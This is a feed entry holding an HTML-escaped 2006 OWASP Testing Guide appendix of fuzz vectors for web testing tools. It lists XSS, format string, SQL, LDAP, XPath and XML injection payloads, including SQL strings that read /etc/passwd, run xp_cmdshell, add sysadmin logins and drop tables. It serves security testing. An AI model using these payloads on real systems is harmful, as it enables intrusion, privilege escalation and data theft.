				<updated>2006-12-13T23:44:27Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Format String Errors (FSE) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
